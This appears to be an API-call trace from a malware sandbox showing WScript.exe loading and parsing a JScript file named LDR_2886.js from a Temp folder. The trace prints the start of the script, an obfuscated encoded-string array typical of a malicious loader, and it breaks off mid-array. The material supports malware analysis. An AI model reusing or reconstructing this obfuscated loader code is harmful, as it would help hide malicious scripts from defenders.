	[0072.664] CoCreateInstance (in: rclsid=0x1feec8*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xff541800*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1feec0 | out: ppv=0x1feec0*=0x2b6780) returned 0x0
	[0072.675] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1fd0c0 | out: lpSystemTimeAsFileTime=0x1fd0c0*(dwLowDateTime=0xa3c23fa0, dwHighDateTime=0x1d543d1)) 
	[0072.675] GetCurrentProcessId () returned 0xbb0
	[0072.675] GetCurrentThreadId () returned 0xbbc
	[0072.675] GetTickCount () returned 0x22e5f
	[0072.675] QueryPerformanceCounter (in: lpPerformanceCount=0x1fd0c8 | out: lpPerformanceCount=0x1fd0c8*=19710117088) returned 1
	[0072.675] malloc (_Size=0x100) returned 0x2b6670
	[0072.676] __dllonexit () returned 0x7fedf500728
	[0072.676] __dllonexit () returned 0x7fedf500780
	[0072.676] __dllonexit () returned 0x7fedf500750
	[0072.676] __dllonexit () returned 0x7fedf5007b0
	[0072.676] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefd710000
	[0072.677] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegisterTraceGuidsA") returned 0x7717f570
	[0072.677] EtwRegisterTraceGuidsA () returned 0x0
	[0072.677] EtwRegisterTraceGuidsA () returned 0x0
	[0072.677] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1fccb0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0072.678] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegOpenKeyExA") returned 0x7fefd72b5f0
	[0072.678] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x1fce18 | out: phkResult=0x1fce18*=0x0) returned 0x2
	[0072.683] GetVersion () returned 0x1db10106
	[0072.684] ??2@YAPEAX_K@Z () returned 0x2b5aa0
	[0072.684] ??2@YAPEAX_K@Z () returned 0x2b6780
	[0072.684] GetUserDefaultLCID () returned 0x409
	[0072.684] GetACP () returned 0x4e4
	[0072.684] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0072.684] GetCurrentThreadId () returned 0xbbc
	[0072.684] ??2@YAPEAX_K@Z () returned 0x2b5aa0
	[0072.684] GetCurrentThreadId () returned 0xbbc
	[0072.685] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0x1fedf8 | out: phkResult=0x1fedf8*=0x104) returned 0x0
	[0072.685] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegQueryValueExA") returned 0x7fefd72c480
	[0072.685] RegQueryValueExA (in: hKey=0x104, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0x1fedf0, lpData=0x1fede8, lpcbData=0x1fede0*=0x4 | out: lpType=0x1fedf0*=0x4, lpData=0x1fede8*=0x1, lpcbData=0x1fede0*=0x4) returned 0x0
	[0072.685] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegCloseKey") returned 0x7fefd730710
	[0072.685] RegCloseKey (hKey=0x104) returned 0x0
	[0072.685] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7fefea30000
	[0072.685] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoGetObjectContext") returned 0x7fefea4c920
	[0072.685] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefea30000
	[0072.685] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoCreateInstance") returned 0x7fefea57490
	[0072.685] CoCreateInstance (in: rclsid=0x7fedf56cba0*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fedf56cd80*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1fedc0 | out: ppv=0x1fedc0*=0x7fefec0a1b0) returned 0x0
	[0072.687] ??2@YAPEAX_K@Z () returned 0x2b6b30
	[0072.687] ??2@YAPEAX_KHPEBDH@Z () returned 0x2b5af0
	[0072.687] ??2@YAPEAX_K@Z () returned 0x2b6bf0
	[0072.687] ??2@YAPEAX_K@Z () returned 0x2b6c50
	[0072.687] ??2@YAPEAX_K@Z () returned 0x2b7140
	[0072.688] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x1fed80, nSize=0x27 | out: lpBuffer="") returned 0x0
	[0072.688] GetUserDefaultLCID () returned 0x409
	[0072.688] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
	[0072.688] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x1fee20, cchData=6 | out: lpLCData="1252") returned 5
	[0072.688] IsValidCodePage (CodePage=0x4e4) returned 1
	[0072.688] CoCreateInstance (in: rclsid=0x7fedf565d88*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fedf565d98*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x2b6af0 | out: ppv=0x2b6af0*=0x3b75b0) returned 0x0
	[0072.688] IUnknown:AddRef (This=0x3b75b0) returned 0x2
	[0072.688] GetCurrentProcessId () returned 0xbb0
	[0072.688] GetCurrentThreadId () returned 0xbbc
	[0072.688] GetTickCount () returned 0x22e6f
	[0072.688] ISystemDebugEventFire:BeginSession (This=0x3b75b0, guidSourceID=0x7fedf565da8, strSessionName="JScript:00002992:00003004:18142959") returned 0x0
	[0072.688] GetCurrentThreadId () returned 0xbbc
	[0072.688] ??2@YAPEAX_K@Z () returned 0x2b71e0
	[0072.688] ??2@YAPEAX_K@Z () returned 0x2b7230
	[0072.688] malloc (_Size=0x80) returned 0x2b72e0
	[0072.688] malloc (_Size=0x108) returned 0x2b7370
	[0072.688] GetTickCount () returned 0x22e6f
	[0072.688] GetCurrentThreadId () returned 0xbbc
	[0072.689] ??2@YAPEAX_K@Z () returned 0x2b7480
	[0072.689] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\ldr_2886.js"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x110
	[0072.689] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4b68
	[0072.689] CreateFileMappingA (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b68, lpName=0x0) returned 0x114
	[0072.689] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x290000
	[0072.689] GetVersionExA (in: lpVersionInformation=0x1fefd0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xfd343301, dwBuildNumber=0x7fe, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1fefd0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0072.689] IsTextUnicode (in: lpv=0x290000, iSize=19304, lpiResult=0x1fefc0 | out: lpiResult=0x1fefc0) returned 0
	[0072.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x290000, cbMultiByte=19304, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19304
	[0072.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x290000, cbMultiByte=19304, lpWideCharStr=0x3bf978, cchWideChar=19304 | out: lpWideCharStr="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 19304
	[0072.690] UnmapViewOfFile (lpBaseAddress=0x290000) returned 1
	[0072.690] CloseHandle (hObject=0x114) returned 1
	[0072.690] CloseHandle (hObject=0x110) returned 1
	[0072.691] GetSystemDirectoryA (in: lpBuffer=0x1ff048, uSize=0x0 | out: lpBuffer="\x8c\xf4\x1f") returned 0x14
	[0072.691] ??2@YAPEAX_K@Z () returned 0x2b74d0
	[0072.691] GetSystemDirectoryA (in: lpBuffer=0x2b74d0, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0072.691] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x7fefd710000
	[0072.691] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0072.691] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferIdentifyLevel") returned 0x7fefd72e470
	[0072.691] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferComputeTokenFromLevel") returned 0x7fefd72f9b0
	[0072.691] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferCloseLevel") returned 0x7fefd72f660
	[0072.691] IdentifyCodeAuthzLevelW () returned 0x1
	[0073.122] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1fe1c0 | out: lpSystemTimeAsFileTime=0x1fe1c0*(dwLowDateTime=0xa403dc80, dwHighDateTime=0x1d543d1)) 
	[0073.122] GetCurrentProcessId () returned 0xbb0
	[0073.122] GetCurrentThreadId () returned 0xbbc
	[0073.122] GetTickCount () returned 0x23014
	[0073.122] QueryPerformanceCounter (in: lpPerformanceCount=0x1fe1c8 | out: lpPerformanceCount=0x1fe1c8*=19754809945) returned 1
	[0073.122] malloc (_Size=0x100) returned 0x2b7b60
	[0073.122] GetVersionExA (in: lpVersionInformation=0x1fdfa0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xe33af810, dwBuildNumber=0x7fe, dwPlatformId=0xe33a0000, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x1fdfa0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0073.122] GetUserDefaultLCID () returned 0x409
	[0073.123] IsFileSupportedName () returned 0x1
	[0073.123] _wcsicmp (_String1=".vbs", _String2=".js") returned 12
	[0073.123] _wcsicmp (_String1=".vbe", _String2=".js") returned 12
	[0073.123] _wcsicmp (_String1=".js", _String2=".js") returned 0
	[0073.128] GetSignedDataMsg () returned 0x0
	[0073.128] GetCurrentProcess () returned 0xffffffffffffffff
	[0073.128] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x114, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1fe800, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1fe800*=0x140) returned 1
	[0073.128] GetFileSize (in: hFile=0x140, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4b68
	[0073.128] ??2@YAPEAX_K@Z () returned 0x2ba4f0
	[0073.129] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0073.129] ReadFile (in: hFile=0x140, lpBuffer=0x2ba4f0, nNumberOfBytesToRead=0x4b68, lpNumberOfBytesRead=0x1fe7e0, lpOverlapped=0x0 | out: lpBuffer=0x2ba4f0*, lpNumberOfBytesRead=0x1fe7e0*=0x4b68, lpOverlapped=0x0) returned 1
	[0073.129] CoInitialize (pvReserved=0x0) returned 0x1
	[0073.129] CoCreateInstance (in: rclsid=0x7fee33af850*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee33af860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x1fe750 | out: ppv=0x1fe750*=0x2bf4c0) returned 0x0
	[0073.134] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1fc950 | out: lpSystemTimeAsFileTime=0x1fc950*(dwLowDateTime=0xa405b140, dwHighDateTime=0x1d543d1)) 
	[0073.134] GetCurrentProcessId () returned 0xbb0
	[0073.134] GetCurrentThreadId () returned 0xbbc
	[0073.134] GetTickCount () returned 0x23024
	[0073.134] QueryPerformanceCounter (in: lpPerformanceCount=0x1fc958 | out: lpPerformanceCount=0x1fc958*=19756051778) returned 1
	[0073.147] malloc (_Size=0x100) returned 0x2b7c70
	[0073.147] __dllonexit () returned 0x7fef24d14c0
	[0073.147] __dllonexit () returned 0x7fef24d14e8
	[0073.147] GetVersionExA (in: lpVersionInformation=0x1fc730*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7fe, dwMinorVersion=0xf24d2dc9, dwBuildNumber=0x7fe, dwPlatformId=0xf24d14e8, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x1fc730*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0073.147] GetProcessWindowStation () returned 0x30
	[0073.147] GetUserObjectInformationA (in: hObj=0x30, nIndex=1, pvInfo=0x1fc718, nLength=0xc, lpnLengthNeeded=0x1fc710 | out: pvInfo=0x1fc718, lpnLengthNeeded=0x1fc710) returned 1
	[0073.148] ??2@YAPEAX_K@Z () returned 0x2bf060
	[0073.148] ??2@YAPEAX_K@Z () returned 0x2bf0b0
	[0073.148] ??2@YAPEAX_K@Z () returned 0x2bf0e0
	[0073.148] ??2@YAPEAX_K@Z () returned 0x2bf120
	[0073.148] ??2@YAPEAX_K@Z () returned 0x2bf160
	[0073.148] ??2@YAPEAX_K@Z () returned 0x2bf1a0
	[0073.148] ??2@YAPEAX_K@Z () returned 0x2bf1e0
	[0073.148] ??2@YAPEAX_K@Z () returned 0x2bf220
	[0073.148] ??2@YAPEAX_K@Z () returned 0x2bf260
	[0073.148] ??2@YAPEAX_K@Z () returned 0x2bf2a0
	[0073.148] ??2@YAPEAX_K@Z () returned 0x2bf2e0
	[0073.148] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0073.148] ??2@YAPEAX_K@Z () returned 0x2bf330
	[0073.148] ??2@YAPEAX_K@Z () returned 0x2bf370
	[0073.148] DllGetClassObject (in: rclsid=0x3be400*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7fefebb6cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1fd420 | out: ppv=0x1fd420*=0x2bf0b0) returned 0x0
	[0073.148] ??2@YAPEAX_K@Z () returned 0x2bf0b0
	[0073.148] IClassFactory:CreateInstance (in: This=0x2bf0b0, pUnkOuter=0x0, riid=0x1fe200*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x1fd440 | out: ppvObject=0x1fd440*=0x2bf4c0) returned 0x0
	[0073.148] ??2@YAPEAX_K@Z () returned 0x2bf3b0
	[0073.149] GetSystemInfo (in: lpSystemInfo=0x1fd280 | out: lpSystemInfo=0x1fd280*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0073.149] VirtualQuery (in: lpAddress=0x1fd2f0, lpBuffer=0x1fd2b0, dwLength=0x30 | out: lpBuffer=0x1fd2b0*(BaseAddress=0x1fd000, AllocationBase=0x100000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0073.149] ??2@YAPEAX_K@Z () returned 0x2bf3f0
	[0073.149] ??2@YAPEAX_K@Z () returned 0x2bf410
	[0073.149] ??2@YAPEAX_K@Z () returned 0x2bf470
	[0073.149] ??2@YAPEAX_K@Z () returned 0x2bf4a0
	[0073.149] ??2@YAPEAX_K@Z () returned 0x2bf550
	[0073.149] IUnknown:AddRef (This=0x2bf4c0) returned 0x2
	[0073.149] IUnknown:Release (This=0x2bf4c0) returned 0x1
	[0073.149] IUnknown:Release (This=0x2bf0b0) returned 0x0
	[0073.149] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0073.149] IUnknown:QueryInterface (in: This=0x2bf4c0, riid=0x7fee33af860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x1fe688 | out: ppvObject=0x1fe688*=0x2bf4c0) returned 0x0
	[0073.149] IUnknown:Release (This=0x2bf4c0) returned 0x1
	[0073.149] _strnicmp (_Str1="<?xml", _Str="var d", _MaxCount=0x5) returned -58
	[0073.149] IsTextUnicode (in: lpv=0x2ba4f0, iSize=19304, lpiResult=0x1fe6d8 | out: lpiResult=0x1fe6d8) returned 0
	[0073.149] GetACP () returned 0x4e4
	[0073.149] malloc (_Size=0x97d0) returned 0x48dfd0
	[0073.150] GetACP () returned 0x4e4
	[0073.150] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ba4f0, cbMultiByte=19304, lpWideCharStr=0x48dfd0, cchWideChar=19432 | out: lpWideCharStr="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ